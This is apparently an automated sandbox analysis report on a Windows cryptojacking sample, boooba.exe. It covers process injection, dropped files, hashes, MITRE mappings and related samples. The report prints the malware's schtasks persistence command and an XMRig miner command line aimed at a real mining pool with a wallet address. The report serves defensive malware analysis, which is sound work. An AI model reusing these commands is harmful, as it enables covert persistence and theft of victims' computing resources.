Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140775000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140776000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140777000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140779000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 59CFC77010
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Memory written: C:\Windows\System32\conhost.exe base: 29965300000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140000000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140001000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140367000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140753000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140775000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140776000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140777000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 140779000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\nslookup.exe base: 26087A5010
Source: C:\Users\user\Desktop\boooba.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Users\user\IOAshdohSha.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Users\user\IOAshdohSha.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\nslookup.exe | Code function: 12_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count badge shown next to that technique in the report, kept as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task
Persistence: 1 Windows Service; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Windows Service; 511 Process Injection; 1 Scheduled Task/Job; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; RC Scripts
Defense Evasion: 111 Masquerading; 111 Virtualization/Sandbox Evasion; 511 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 3 Security Software Discovery; 111 Virtualization/Sandbox Evasion; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1545299, Sample: boooba.exe, Start date: 30/10/2024, Architecture: WINDOWS, Score: 100)

Top-level signatures: Sigma detected: Xmrig; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures
DNS: xmr-eu1.nanopool.org (DNS related to crypt mining pools)

Process tree (graph node IDs in parentheses):

IOAshdohSha.exe (11) started
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  conhost.exe (16) started
    Dropped: C:\Users\user\AppData\...\sihost64.exe, PE32+; C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+
    Signatures: Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses nslookup.exe to query domains; 4 other signatures
    sihost64.exe (22) started
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures
      conhost.exe (31) started
    nslookup.exe (25) started
      Signatures: Query firmware table information (likely to detect VMs)

boooba.exe (14) started
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
  conhost.exe (20) started
    Dropped: C:\Users\user\IOAshdohSha.exe, PE32+; C:\Users\...\IOAshdohSha.exe:Zone.Identifier, ASCII
    Signatures: Drops PE files to the user root directory
    cmd.exe (27) started
      IOAshdohSha.exe (33) started
        Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
        conhost.exe (42) started
          Signatures: Uses nslookup.exe to query domains; Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
          nslookup.exe (45) started
            Signatures: Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Network: 212.47.253.124, 10300, 49730, 49731 (OnlineSASFR, France); Detected Stratum mining protocol
      conhost.exe (36) started
    cmd.exe (29) started
      Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
      conhost.exe (38) started
      schtasks.exe (40) started

Source | Detection | Scanner | Label
boooba.exe | 71% | ReversingLabs | Win64.Trojan.Donut
boooba.exe | 100% | Avira | HEUR/AGEN.1344202
boooba.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Avira | HEUR/AGEN.1344832
C:\Users\user\IOAshdohSha.exe | 100% | Avira | HEUR/AGEN.1344202
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Joe Sandbox ML |
C:\Users\user\IOAshdohSha.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 5% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 74% | ReversingLabs | Win64.Trojan.Donut
C:\Users\user\IOAshdohSha.exe | 71% | ReversingLabs | Win64.Trojan.Donut

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr-eu1.nanopool.org | 51.15.58.224 | true | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://xmrig.com/benchmark/%s | conhost.exe (process 00000009 and 0000000B memory dumps) | false | | unknown
https://xmrig.com/wizard | conhost.exe (process 00000009 and 0000000B memory dumps) | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | conhost.exe (process 00000001 memory dump) | false | URL Reputation: safe | unknown
https://xmrig.com/wizard%s | conhost.exe (process 00000009 and 0000000B memory dumps) | false | | unknown
https://xmrig.com/docs/algorithms | conhost.exe (process 00000009 and 0000000B memory dumps) | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
212.47.253.124 | unknown | France | 12876 | OnlineSASFR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545299
Start date and time: 2024-10-30 11:41:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: boooba.exe
Detection: MAL
Classification: mal100.troj.evad.mine.winEXE@26/5@1/1
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target nslookup.exe, PID 5480 because there are no executed functions
• Execution Graph export aborted for target nslookup.exe, PID 6288 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: boooba.exe
Time | Type | Description
06:42:00 | API Interceptor | 7x Sleep call for process: conhost.exe modified
10:42:02 | Task Scheduler | Run new task: IOAshdohSha path: C:\Users\user\IOAshdohSha.exe
Match: 212.47.253.124
Associated Sample Name / URL | Detection | Threat Name | Context
2JkHiPgkLE.exe | malicious | Xmrig |
SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe | malicious | Xmrig |
Gw2G72kSsY.exe | malicious | Xmrig |
file.exe | malicious | Xmrig |
ekBTbONX85.exe | malicious | Xmrig |
RPHbzz3JqY.exe | malicious | ScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRAT |
Loader.exe | malicious | LummaC, Xmrig |
2mim34IfQZ.exe | malicious | AsyncRAT, PureLog Stealer, Xmrig, zgRAT |
8EbwkHzF0i.exe | malicious | Xmrig, zgRAT |
upw82ArDKW.exe | malicious | Glupteba, RedLine, SmokeLoader, Xmrig |
Match: xmr-eu1.nanopool.org
Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
2HUgVjrn3O.exe | malicious | Xmrig | 51.15.58.224
SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig | 141.94.23.83
Yf4yviDxwF.exe | malicious | Xmrig | 54.37.232.103
file.exe | malicious | Xmrig | 54.37.137.114
Q3Vq6yp33F.exe | malicious | Xmrig | 51.15.65.182
2JkHiPgkLE.exe | malicious | Xmrig | 51.15.58.224
file.exe | malicious | Xmrig | 51.89.23.91
eqkh9g37Yb.exe | malicious | Xmrig | 146.59.154.106
SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe | malicious | Xmrig | 51.15.65.182
SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe | malicious | Vidar, Xmrig | 54.37.232.103
Match: OnlineSASFR
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
belks.sh4.elf | malicious | Mirai | 62.210.152.252
Yf4yviDxwF.exe | malicious | Xmrig | 51.15.193.130
file.exe | malicious | Xmrig | 163.172.154.142
la.bot.powerpc.elf | malicious | Unknown | 51.159.148.50
3HOhJoCrj5.elf | malicious | Unknown | 151.115.48.162
yakuza.i686.elf | malicious | Unknown | 195.154.190.2
1vocVfphyt.exe | malicious | PureLog Stealer, RedLine | 163.172.24.191
mips.elf | malicious | Mirai | 62.210.152.255
https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOcc | malicious | Unknown | 51.158.28.82
M3Llib2vh3.elf | malicious | Mirai | 62.210.152.202
                                            No context
Match: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe | malicious | Xmrig |
2HUgVjrn3O.exe | malicious | Xmrig |
SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig |
Yf4yviDxwF.exe | malicious | Xmrig |
file.exe | malicious | Xmrig |
SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig |
prog.exe | malicious | Xmrig |
T52Z708x2p.exe | malicious | Phorpiex, Xmrig |
lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig |
Us051y7j25.exe | malicious | Phorpiex, Xmrig |
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):539
                                                                Entropy (8bit):5.356620128167825
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCv:ML9E4KQMsXE4Np/E4Ks
                                                                MD5:7155C0B26CEC4BA9E8198691F0343F69
                                                                SHA1:0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF
                                                                SHA-256:59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
                                                                SHA-512:62A480C5AD8A978E41D29B6C03666D30569A0A7A1F8D92DA201CE839FE4578782EAEF5EF4B675306668F5813B71F2467B52AE090BDCF5313C276631DBD6E9379
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe, Detection: malicious
• Filename: 2HUgVjrn3O.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, Detection: malicious
• Filename: Yf4yviDxwF.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, Detection: malicious
• Filename: prog.exe, Detection: malicious
• Filename: T52Z708x2p.exe, Detection: malicious
• Filename: lJ4EzPSKMj.exe, Detection: malicious
• Filename: Us051y7j25.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):31744
                                                                Entropy (8bit):7.581390529189409
                                                                Encrypted:false
                                                                SSDEEP:384:IBTkWK8LeaODD7tHldY+vLkh5O89wv8x3MJyA5gs5ZSQiXW7m+ZdvB7Knwr+UP35:DqStDD7rk0gbihwSvBue+U/Hf
                                                                MD5:6A7E9885A2D01DF564B46F8F27258853
                                                                SHA1:2F57231A188226669FF74CF886A09572ED69025E
                                                                SHA-256:6BA3E42C8FA7DABE994E2793F369BAC914EA2E4949174FC2A0EFE4CBFEBE8171
                                                                SHA-512:84B4B84066A48DF6BD087679A75333C306C8F688679C508E171B14D5012711DE3A781CEA4D4C65DEBB694557DAFD66DBC359516451F700179D5C6806710CDF17
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@.....................................h.......................................................0...<...................................................................................l................................text............................... ..`.rdata..n_...0...`..................@..@.bss.....................................pdata...............z..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2234368
                                                                Entropy (8bit):7.999661300763701
                                                                Encrypted:true
                                                                SSDEEP:24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS
                                                                MD5:EF9E6A4BAB77A1E5ED51669EABEBA31D
                                                                SHA1:43B67B32D2FD462F0CB9277ED974D63A5575FC8C
                                                                SHA-256:AB41E347FEC54AF86EF8EDD98C695A7E856A93A30CD07A89D7669896B419B92B
                                                                SHA-512:8D3605E486F0CCB01D3022D54C57E8C65622272F5B477035469E45D3289973407F0584142B261A3FACA797E03412D182C376C2A2BA6970181E059982223AFE99
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....A.".....................................................0)".<............@".....................................................................l)"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\conhost.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Entropy (8bit):7.999661300763701
                                                                TrID:
                                                                • Win64 Executable (generic) (12005/4) 74.80%
                                                                • Generic Win/DOS Executable (2004/3) 12.49%
                                                                • DOS Executable Generic (2002/1) 12.47%
                                                                • VXD Driver (31/22) 0.19%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                File name:boooba.exe
                                                                File size:2'234'368 bytes
                                                                MD5:ef9e6a4bab77a1e5ed51669eabeba31d
                                                                SHA1:43b67b32d2fd462f0cb9277ed974d63a5575fc8c
                                                                SHA256:ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
                                                                SHA512:8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99
                                                                SSDEEP:24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS
                                                                TLSH:0DA53321FEBBB93FF56B817D9425415E20D1C9F4730630C7799E8A6E1B394A04BA0E36
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....A."....................................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x4022fa
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                DLL Characteristics:
Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC] (zeroed: the linker timestamp was stripped, so it gives no build date)
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:02549ff92b49cce693542fc9afb10102
Instruction (entrypoint disassembly). Caveat: the listing is decoded as 32-bit code although the file is PE32+, so each dec eax / dec ecx / dec esp printed before an instruction is really the 0x48 / 0x49 / 0x4C REX prefix of that instruction: push ebp; dec eax; mov ebp, esp is push rbp; mov rbp, rsp, and dec eax; mov eax, 00000004h; add byte ptr [eax], al; add byte ptr [eax], al is one 10-byte movabs rax, 4. Memory operands printed as absolute addresses (lea eax, dword ptr [FFFFFF98h], mov eax, dword ptr [00220624h]) are RIP-relative in 64-bit mode. Re-disassemble in 64-bit mode before reasoning about this stub.
                                                                push ebp
                                                                dec eax
                                                                mov ebp, esp
                                                                dec eax
                                                                sub esp, 00000040h
                                                                dec eax
                                                                mov eax, 00000004h
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                dec ecx
                                                                mov eax, eax
                                                                mov eax, 00000000h
                                                                dec ecx
                                                                mov ebx, eax
                                                                dec eax
                                                                lea eax, dword ptr [ebp-04h]
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                dec esp
                                                                mov edx, ebx
                                                                call 00007FC94455F5E1h
                                                                dec eax
                                                                lea eax, dword ptr [FFFFFF98h]
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                call 00007FC94455F5FFh
                                                                mov eax, 00000001h
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                call 00007FC94455F5F7h
                                                                mov eax, 00030000h
                                                                dec ecx
                                                                mov ebx, eax
                                                                mov eax, 00010000h
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                dec esp
                                                                mov edx, ebx
                                                                call 00007FC94455F5E4h
                                                                dec eax
                                                                mov eax, dword ptr [00220624h]
                                                                dec eax
                                                                mov ecx, dword ptr [00220625h]
                                                                dec eax
                                                                mov edx, dword ptr [00220626h]
                                                                dec eax
                                                                mov dword ptr [ebp-10h], eax
                                                                dec eax
                                                                lea eax, dword ptr [ebp-04h]
                                                                dec eax
                                                                mov dword ptr [esp+20h], eax
                                                                mov eax, dword ptr [00221C17h]
                                                                dec ecx
                                                                mov ecx, eax
